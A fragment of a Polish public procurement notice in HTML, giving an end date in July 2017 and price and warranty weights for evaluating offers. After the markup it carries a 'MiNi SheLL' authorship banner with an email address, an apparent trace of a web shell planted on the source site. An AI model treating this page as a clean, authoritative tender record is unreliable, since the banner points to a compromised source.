                      data zakończenia: 31/07/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>okres gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com